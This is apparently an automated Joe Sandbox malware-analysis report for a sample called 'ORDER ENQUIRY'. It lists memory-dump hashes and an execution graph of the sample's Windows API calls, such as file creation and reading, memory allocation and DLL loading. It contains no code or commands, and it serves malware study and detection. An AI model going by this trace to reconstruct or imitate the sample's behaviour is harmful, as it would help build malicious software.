                                                                                                                                                                          • Opcode Fuzzy Hash: 6302d58d8cd4bbcd598096ccb76a11290587070e8ff44d5922e3be1b5461ba9e
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B21F271504204EFDB45DFA8D9C0F26BBA9FB88728F20C56DED094B356C37AD446CA61
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2096787414.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_135d000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6e61f8af8d198d844a2345143052c0ac8f56301e27e71c649a7a1e037c6bf877
                                                                                                                                                                          • Instruction ID: bbd80a4bbd83f6e05351741ffbec349d6427071dec8cf31c75406266e519e97c
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e61f8af8d198d844a2345143052c0ac8f56301e27e71c649a7a1e037c6bf877
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A210071604204DFDB55DF68D980F26BF69FB88718F20C569DD0A4B356C33AD407CAA2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2096787414.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_135d000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 455f27f5a1c4b5727e5bbcfd3409590a611660998f1ba35b5bec849770dd769d
                                                                                                                                                                          • Instruction ID: 8ad15cf1f81900b12dab9fdcc30549d1ee65959bbaadfc89c097af4a24d61d0e
                                                                                                                                                                          • Opcode Fuzzy Hash: 455f27f5a1c4b5727e5bbcfd3409590a611660998f1ba35b5bec849770dd769d
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B21A1755093808FDB03CF24D994B15BF71EB46218F28C5EAD8498B2A7C33AD40ACB62
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2096740919.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_134d000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                          • Instruction ID: 7e56dff6ce86a9f86a0e4f67ed0ea9fef9f459d06142c34e733174240de8cbea
                                                                                                                                                                          • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                          • Instruction Fuzzy Hash: A811E172504280CFCB02CF54D5C4B16BFB1FB98318F24C6A9D9490B257C336E45ACBA2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2096740919.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_134d000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                          • Instruction ID: 4ddff949096dca967a31d53ef32a9a2e41829a0bf8b66df62a243119d8648ee7
                                                                                                                                                                          • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3611CD76404240CFDB02CF54D5C4B56BFA1FB94224F24C6A9D9090A256C33AE45ACBA2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2096787414.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_135d000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                                                                          • Instruction ID: d4686fb2c76aee4e513f03a27523c52dafd1d20ec333f5a85839c915d17d9704
                                                                                                                                                                          • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                                                                          • Instruction Fuzzy Hash: 1811BB75504280DFDB02CF54C5C4B15BFB1FB84628F24C6ADDC494B296C33AD44ACB62
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2096740919.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_134d000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: abc40d2990824f7cdad8dd48942dcfc230b09a3c069d35f9469d6673e7fb738c
                                                                                                                                                                          • Instruction ID: 8f5d40f927207c026d24a5af90c7c5a7bff50f4fbd6aabdcbee42e77b977a7b1
                                                                                                                                                                          • Opcode Fuzzy Hash: abc40d2990824f7cdad8dd48942dcfc230b09a3c069d35f9469d6673e7fb738c
                                                                                                                                                                          • Instruction Fuzzy Hash: BC012B310043849BE720CF99CD84B67FFDCEF55328F18C52AED090A286C239A800CA71
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2096740919.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_134d000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3b6ba5364c229693d74d3ced9778e20fbad15e8ea9a7340068818d21c651b93f
                                                                                                                                                                          • Instruction ID: c1451bdfccc5d028b2c668e90209e99ae2873d44cdd61d344aec389b532aef34
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b6ba5364c229693d74d3ced9778e20fbad15e8ea9a7340068818d21c651b93f
                                                                                                                                                                          • Instruction Fuzzy Hash: 3DF062714043849FE7118E1AC888B66FFD8EF55738F18C45AED485A286C27AA844CBB1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fb0b5d05e0de4e7a716c1d602d8185789364ef243416f8af1c4f384de514998a
                                                                                                                                                                          • Instruction ID: 2f367e0f6b67191e00e03104e9f4db2071e120faceab83a85d83a4f22363e018
                                                                                                                                                                          • Opcode Fuzzy Hash: fb0b5d05e0de4e7a716c1d602d8185789364ef243416f8af1c4f384de514998a
                                                                                                                                                                          • Instruction Fuzzy Hash: E6D1CFB0B012068FDB29DB75C4547AEB7F6AF89340F14486DE1469B391DB39E901CB62
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 80fa5085c4a40f8e4a36fcace727b6843c5890fc8aeccceb425bf8f8edb27378
                                                                                                                                                                          • Instruction ID: 4442d89ac7fa67af06781addeca9e1671ab75a77f31f3cf11d35862163c2a896
                                                                                                                                                                          • Opcode Fuzzy Hash: 80fa5085c4a40f8e4a36fcace727b6843c5890fc8aeccceb425bf8f8edb27378
                                                                                                                                                                          • Instruction Fuzzy Hash: 18E109B4E006598FCB14CFA9C5809AEFBB2FF89305F648169D414AB356D734AD42CF61
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2aa5930786b63aba64e8fd82059cb0dbbdc601a9668cf0f84bf8142143ff74a9
                                                                                                                                                                          • Instruction ID: ff7bb7468323d7ffafe53f2d6ae80c4addcdaafe46272b7d52f04aafd6423e98
                                                                                                                                                                          • Opcode Fuzzy Hash: 2aa5930786b63aba64e8fd82059cb0dbbdc601a9668cf0f84bf8142143ff74a9
                                                                                                                                                                          • Instruction Fuzzy Hash: 73E1C7B4E002598FCB14DFA9C5809AEFBB2FF89305F248169D414AB356DB35AD42CF61
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b0ed86039c7081e110cca45b696392baa6b3bff7db43ec593c672ce6b8ebb9ab
                                                                                                                                                                          • Instruction ID: 88415df47e0ca038c304317b46302f99312976ecbfe73e5df74b2fd2c467c339
                                                                                                                                                                          • Opcode Fuzzy Hash: b0ed86039c7081e110cca45b696392baa6b3bff7db43ec593c672ce6b8ebb9ab
                                                                                                                                                                          • Instruction Fuzzy Hash: D5E1D8B4E002598FDB14CFA9C5809AEBBB2FF89305F248169D414AB356DB31A942CF61
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d8be8172cf623e2e768579f07bb5d76d35fc7f1c902c1d8cbf05c672edaaf0ee
                                                                                                                                                                          • Instruction ID: 9fc5bc2d2f477ec7d9f39f1694693b9b96fbc9509185cb256fe9a41ba93bdaec
                                                                                                                                                                          • Opcode Fuzzy Hash: d8be8172cf623e2e768579f07bb5d76d35fc7f1c902c1d8cbf05c672edaaf0ee
                                                                                                                                                                          • Instruction Fuzzy Hash: FDE1E7B4E006598FCB14CFA9C5809AEBBB2FF89305F64C169D415AB356DB30AD42CF61
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fdd4d654d00faddf83fe7f3b7136e281aaef2b24bcf27cd3726c7cf870e93aad
                                                                                                                                                                          • Instruction ID: 10b914855d5f69cca01623447be39a67259681d76db3ecdfc5e0628f84eb4c68
                                                                                                                                                                          • Opcode Fuzzy Hash: fdd4d654d00faddf83fe7f3b7136e281aaef2b24bcf27cd3726c7cf870e93aad
                                                                                                                                                                          • Instruction Fuzzy Hash: 9EE1D9B4E102598FCB14DFA9C5809AEBBB2FF49305F24C169D814A7356DB31A942CF61
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 61b879969ffe543d935808584a9fba890f8541dd258049971829c8857034d098
                                                                                                                                                                          • Instruction ID: 8c9d0f3072e8e0e48d4ffd5f4d3b1ab4f9895269293e9e7888d06be75839cf65
                                                                                                                                                                          • Opcode Fuzzy Hash: 61b879969ffe543d935808584a9fba890f8541dd258049971829c8857034d098
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DA13A32E0021A8FCF09DFA4C84859EBBF2FF85304B15856AE906AF265DF71E955CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4565aa5b0efb77e60ff8e0f205dc5036657b9df99d2793beeab1a85d46359cba
                                                                                                                                                                          • Instruction ID: 8fd280a1a1ff8c183024d04dd79720222eb1f0a0173d57333d6ea77f3ce83403
                                                                                                                                                                          • Opcode Fuzzy Hash: 4565aa5b0efb77e60ff8e0f205dc5036657b9df99d2793beeab1a85d46359cba
                                                                                                                                                                          • Instruction Fuzzy Hash: 22510BB4E006198FDB14CFA9C5805AEFBF2FF89305F24C16AD418A7256DB349A42CF61
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 06093e842168260a0be54c6c877b88f7aeb3d351a632ddf165fe8aaa69040904
                                                                                                                                                                          • Instruction ID: d7ed5feb289631e6fa907243e6e56fe3c86e07b44ad01ed680f5088883486483
                                                                                                                                                                          • Opcode Fuzzy Hash: 06093e842168260a0be54c6c877b88f7aeb3d351a632ddf165fe8aaa69040904
                                                                                                                                                                          • Instruction Fuzzy Hash: 15511EB4E046598FCB14CFA9C9805AEFBF2FF89305F64C169D418AB256D7309A42CF61
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c2828f2c18bf18cf2ac4b400a78dd14978a14a5698bc251a91e9c9f82d505ce6
                                                                                                                                                                          • Instruction ID: 1578e5019c5d743a158f8742dfc4abd845e3d54689391ca9663e0cb4a3f04f8a
                                                                                                                                                                          • Opcode Fuzzy Hash: c2828f2c18bf18cf2ac4b400a78dd14978a14a5698bc251a91e9c9f82d505ce6
                                                                                                                                                                          • Instruction Fuzzy Hash: 72C04CA6AAF008D686104DA5A0054F8B77CA28B1B3F013461D50EA3503575055395645

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:1.4%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:2.6%
                                                                                                                                                                          Signature Coverage:5.8%
                                                                                                                                                                          Total number of Nodes:569
                                                                                                                                                                          Total number of Limit Nodes:73
                                                                                                                                                                          execution_graph 98830 41f020 98833 41b960 98830->98833 98834 41b986 98833->98834 98841 409d30 98834->98841 98836 41b992 98837 41b9b3 98836->98837 98849 40c1b0 98836->98849 98839 41b9a5 98885 41a6a0 98839->98885 98888 409c80 98841->98888 98843 409d3d 98844 409d44 98843->98844 98900 409c20 98843->98900 98844->98836 98850 40c1d5 98849->98850 99335 40b1b0 98850->99335 98852 40c22c 99339 40ae30 98852->99339 98854 40c252 98884 40c4a3 98854->98884 99348 414390 98854->99348 98856 40c297 98856->98884 99351 408a60 98856->99351 98858 40c2db 98858->98884 99358 41a4f0 98858->99358 98862 40c331 98863 40c338 98862->98863 99370 41a000 98862->99370 98864 41bdb0 2 API calls 98863->98864 98866 40c345 98864->98866 98866->98839 98868 40c382 98869 41bdb0 2 API calls 98868->98869 98870 40c389 98869->98870 98870->98839 98871 40c392 98872 40f490 3 API calls 98871->98872 98873 40c406 98872->98873 98873->98863 98874 40c411 98873->98874 98875 41bdb0 2 API calls 98874->98875 98876 40c435 98875->98876 99375 41a050 98876->99375 98879 41a000 2 API calls 98880 40c470 98879->98880 98880->98884 99380 419e10 98880->99380 98883 41a6a0 2 API calls 98883->98884 98884->98839 98886 41a6bf ExitProcess 98885->98886 98887 41af50 LdrLoadDll 98885->98887 98887->98886 98919 418bb0 98888->98919 98892 409ca6 98892->98843 98893 409c9c 98893->98892 98926 41b2a0 98893->98926 98895 409ce3 98895->98892 98937 409aa0 98895->98937 98897 409d03 98943 409620 LdrLoadDll 98897->98943 98899 409d15 98899->98843 99309 41b590 98900->99309 98903 41b590 LdrLoadDll 98904 409c4b 98903->98904 98905 41b590 LdrLoadDll 98904->98905 98906 409c61 98905->98906 98907 40f170 98906->98907 98908 40f189 98907->98908 99318 40b030 98908->99318 98910 40f19c 99322 41a1d0 98910->99322 98914 40f1c2 98915 40f1ed 98914->98915 99328 41a250 98914->99328 98916 41a480 2 API calls 98915->98916 98918 409d55 98916->98918 98918->98836 98920 418bbf 98919->98920 98944 414e40 98920->98944 98922 409c93 98923 418a60 98922->98923 98950 41a5f0 98923->98950 98927 41b2b9 98926->98927 98957 414a40 98927->98957 98929 41b2d1 98930 41b2da 98929->98930 98996 41b0e0 98929->98996 98930->98895 98932 41b2ee 98932->98930 99018 419ef0 98932->99018 98940 409aba 98937->98940 99287 407ea0 98937->99287 98939 409ac1 98939->98897 98940->98939 99300 408160 98940->99300 98943->98899 98945 414e5a 98944->98945 98946 414e4e 98944->98946 98945->98922 98946->98945 98949 4152c0 LdrLoadDll 98946->98949 98948 414fac 98948->98922 98949->98948 98952 418a75 98950->98952 98953 41af50 98950->98953 98952->98893 98954 41af51 98953->98954 98955 414e40 LdrLoadDll 98954->98955 98956 41af82 98954->98956 98955->98956 98956->98952 98958 414d75 98957->98958 98959 414a54 98957->98959 98958->98929 98959->98958 99026 419c40 98959->99026 98962 414b80 99029 41a350 98962->99029 98963 414b63 99086 41a450 LdrLoadDll 98963->99086 98966 414b6d 98966->98929 98967 414ba7 98968 41bdb0 2 API calls 98967->98968 98972 414bb3 98968->98972 98969 414d39 98971 41a480 2 API calls 98969->98971 98970 414d4f 99095 414780 LdrLoadDll NtReadFile NtClose 98970->99095 98973 414d40 98971->98973 98972->98966 98972->98969 98972->98970 98976 414c42 98972->98976 98973->98929 98975 414d62 98975->98929 98977 414ca9 98976->98977 98978 414c51 98976->98978 98977->98969 98979 414cbc 98977->98979 98980 414c56 98978->98980 98981 414c6a 98978->98981 99088 41a2d0 98979->99088 99087 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 98980->99087 98985 414c87 98981->98985 98986 414c6f 98981->98986 98985->98973 99044 414400 98985->99044 99032 4146e0 98986->99032 98988 414c60 98988->98929 98990 414d1c 99092 41a480 98990->99092 98991 414c7d 98991->98929 98994 414c9f 98994->98929 98995 414d28 98995->98929 98997 41b0f1 98996->98997 98998 41b103 98997->98998 99113 41bd30 98997->99113 98998->98932 99000 41b124 99116 414060 99000->99116 99002 41b170 99002->98932 99003 41b147 99003->99002 99004 414060 3 API calls 99003->99004 99005 41b169 99004->99005 99005->99002 99150 41bb30 99005->99150 99008 41b1fa 99010 41b20a 99008->99010 99252 41aef0 LdrLoadDll 99008->99252 99009 41b186 99155 415380 99009->99155 99165 41b060 99010->99165 99013 41b22e 99168 41ad60 99013->99168 99015 41b238 99247 419eb0 99015->99247 99019 419f0c 99018->99019 99020 41af50 LdrLoadDll 99018->99020 99281 1af2c0a 99019->99281 99020->99019 99021 419f27 99023 41bdb0 99021->99023 99284 41a660 99023->99284 99025 41b349 99025->98895 99027 41af50 LdrLoadDll 99026->99027 99028 414b34 99027->99028 99028->98962 99028->98963 99028->98966 99030 41a36c NtCreateFile 99029->99030 99031 41af50 LdrLoadDll 99029->99031 99030->98967 99031->99030 99033 4146fc 99032->99033 99034 41a2d0 LdrLoadDll 99033->99034 99035 41471d 99034->99035 99036 414724 99035->99036 99037 414738 99035->99037 99039 41a480 2 API calls 99036->99039 99038 41a480 2 API calls 99037->99038 99040 414741 99038->99040 99041 41472d 99039->99041 99096 41bfc0 LdrLoadDll RtlAllocateHeap 99040->99096 99041->98991 99043 41474c 99043->98991 99045 41444b 99044->99045 99046 41447e 99044->99046 99047 41a2d0 LdrLoadDll 99045->99047 99048 4145c9 99046->99048 99052 41449a 99046->99052 99050 414466 99047->99050 99049 41a2d0 LdrLoadDll 99048->99049 99056 4145e4 99049->99056 99051 41a480 2 API calls 99050->99051 99053 41446f 99051->99053 99054 41a2d0 LdrLoadDll 99052->99054 99053->98994 99055 4144b5 99054->99055 99057 4144d1 99055->99057 99058 4144bc 99055->99058 99109 41a310 LdrLoadDll 99056->99109 99061 4144d6 99057->99061 99062 4144ec 99057->99062 99060 41a480 2 API calls 99058->99060 99064 4144c5 99060->99064 99065 41a480 2 API calls 99061->99065 99072 4144f1 99062->99072 99097 41bf80 99062->99097 99063 41461e 99067 41a480 2 API calls 99063->99067 99064->98994 99068 4144df 99065->99068 99066 414503 99066->98994 99071 414629 99067->99071 99068->98994 99071->98994 99072->99066 99100 41a400 99072->99100 99073 414557 99079 41456e 99073->99079 99108 41a290 LdrLoadDll 99073->99108 99074 414575 99077 41a480 2 API calls 99074->99077 99075 41458a 99078 41a480 2 API calls 99075->99078 99077->99066 99080 414593 99078->99080 99079->99074 99079->99075 99081 4145bf 99080->99081 99103 41bb80 99080->99103 99081->98994 99083 4145aa 99084 41bdb0 2 API calls 99083->99084 99085 4145b3 99084->99085 99085->98994 99086->98966 99087->98988 99089 414d04 99088->99089 99090 41af50 LdrLoadDll 99088->99090 99091 41a310 LdrLoadDll 99089->99091 99090->99089 99091->98990 99093 41a49c NtClose 99092->99093 99094 41af50 LdrLoadDll 99092->99094 99093->98995 99094->99093 99095->98975 99096->99043 99099 41bf98 99097->99099 99110 41a620 99097->99110 99099->99072 99101 41a41c NtReadFile 99100->99101 99102 41af50 LdrLoadDll 99100->99102 99101->99073 99102->99101 99104 41bb86 99103->99104 99105 41bba4 99104->99105 99106 41bf80 2 API calls 99104->99106 99105->99083 99107 41bbbb 99106->99107 99107->99083 99108->99079 99109->99063 99111 41af50 LdrLoadDll 99110->99111 99112 41a63c RtlAllocateHeap 99111->99112 99112->99099 99114 41bd5d 99113->99114 99253 41a530 99113->99253 99114->99000 99117 414071 99116->99117 99118 414079 99116->99118 99117->99003 99119 41bb30 2 API calls 99118->99119 99120 414083 99119->99120 99149 41434c 99120->99149 99256 41cf20 99120->99256 99122 4140cd 99123 41cf20 2 API calls 99122->99123 99126 4140d8 99123->99126 99124 414126 99127 41cf20 2 API calls 99124->99127 99126->99124 99128 41d050 3 API calls 99126->99128 99267 41cfc0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 99126->99267 99130 41413a 99127->99130 99128->99126 99129 414197 99131 41cf20 2 API calls 99129->99131 99130->99129 99261 41d050 99130->99261 99132 4141ad 99131->99132 99134 4141ea 99132->99134 99136 41d050 3 API calls 99132->99136 99135 41cf20 2 API calls 99134->99135 99137 4141f5 99135->99137 99136->99132 99138 41d050 3 API calls 99137->99138 99143 41422f 99137->99143 99138->99137 99140 414324 99269 41cf80 LdrLoadDll RtlFreeHeap 99140->99269 99142 41432e 99270 41cf80 LdrLoadDll RtlFreeHeap 99142->99270 99268 41cf80 LdrLoadDll RtlFreeHeap 99143->99268 99145 414338 99271 41cf80 LdrLoadDll RtlFreeHeap 99145->99271 99147 414342 99272 41cf80 LdrLoadDll RtlFreeHeap 99147->99272 99149->99003 99152 41bb3a 99150->99152 99151 41bb54 99151->99009 99152->99009 99152->99151 99153 41bf80 2 API calls 99152->99153 99154 41bbbb 99153->99154 99154->99009 99156 415391 99155->99156 99157 414a40 8 API calls 99156->99157 99158 4153a7 99157->99158 99159 4153e2 99158->99159 99160 4153f5 99158->99160 99164 4153fa 99158->99164 99162 41bdb0 2 API calls 99159->99162 99161 41bdb0 2 API calls 99160->99161 99161->99164 99163 4153e7 99162->99163 99163->99008 99164->99008 99166 41bb30 2 API calls 99165->99166 99167 41b074 99166->99167 99167->99013 99169 41ad74 99168->99169 99170 41ac20 2 API calls 99168->99170 99273 41ac20 99169->99273 99170->99169 99173 41ac20 2 API calls 99174 41ad86 99173->99174 99175 41ac20 2 API calls 99174->99175 99176 41ad8f 99175->99176 99177 41ac20 2 API calls 99176->99177 99178 41ad98 99177->99178 99179 41ac20 2 API calls 99178->99179 99180 41ada1 99179->99180 99181 41ac20 2 API calls 99180->99181 99182 41adad 99181->99182 99183 41ac20 2 API calls 99182->99183 99184 41adb6 99183->99184 99185 41ac20 2 API calls 99184->99185 99186 41adbf 99185->99186 99187 41ac20 2 API calls 99186->99187 99188 41adc8 99187->99188 99189 41ac20 2 API calls 99188->99189 99190 41add1 99189->99190 99191 41ac20 2 API calls 99190->99191 99192 41adda 99191->99192 99193 41ac20 2 API calls 99192->99193 99194 41ade6 99193->99194 99195 41ac20 2 API calls 99194->99195 99196 41adef 99195->99196 99197 41ac20 2 API calls 99196->99197 99198 41adf8 99197->99198 99199 41ac20 2 API calls 99198->99199 99200 41ae01 99199->99200 99201 41ac20 2 API calls 99200->99201 99202 41ae0a 99201->99202 99203 41ac20 2 API calls 99202->99203 99204 41ae13 99203->99204 99205 41ac20 2 API calls 99204->99205 99206 41ae1f 99205->99206 99207 41ac20 2 API calls 99206->99207 99208 41ae28 99207->99208 99209 41ac20 2 API calls 99208->99209 99210 41ae31 99209->99210 99211 41ac20 2 API calls 99210->99211 99212 41ae3a 99211->99212 99213 41ac20 2 API calls 99212->99213 99214 41ae43 99213->99214 99215 41ac20 2 API calls 99214->99215 99216 41ae4c 99215->99216 99217 41ac20 2 API calls 99216->99217 99218 41ae58 99217->99218 99219 41ac20 2 API calls 99218->99219 99220 41ae61 99219->99220 99221 41ac20 2 API calls 99220->99221 99222 41ae6a 99221->99222 99223 41ac20 2 API calls 99222->99223 99224 41ae73 99223->99224 99225 41ac20 2 API calls 99224->99225 99226 41ae7c 99225->99226 99227 41ac20 2 API calls 99226->99227 99228 41ae85 99227->99228 99229 41ac20 2 API calls 99228->99229 99230 41ae91 99229->99230 99231 41ac20 2 API calls 99230->99231 99232 41ae9a 99231->99232 99233 41ac20 2 API calls 99232->99233 99234 41aea3 99233->99234 99235 41ac20 2 API calls 99234->99235 99236 41aeac 99235->99236 99237 41ac20 2 API calls 99236->99237 99238 41aeb5 99237->99238 99239 41ac20 2 API calls 99238->99239 99240 41aebe 99239->99240 99241 41ac20 2 API calls 99240->99241 99242 41aeca 99241->99242 99243 41ac20 2 API calls 99242->99243 99244 41aed3 99243->99244 99245 41ac20 2 API calls 99244->99245 99246 41aedc 99245->99246 99246->99015 99248 41af50 LdrLoadDll 99247->99248 99249 419ecc 99248->99249 99280 1af2df0 LdrInitializeThunk 99249->99280 99250 419ee3 99250->98932 99252->99010 99254 41a54c NtAllocateVirtualMemory 99253->99254 99255 41af50 LdrLoadDll 99253->99255 99254->99114 99255->99254 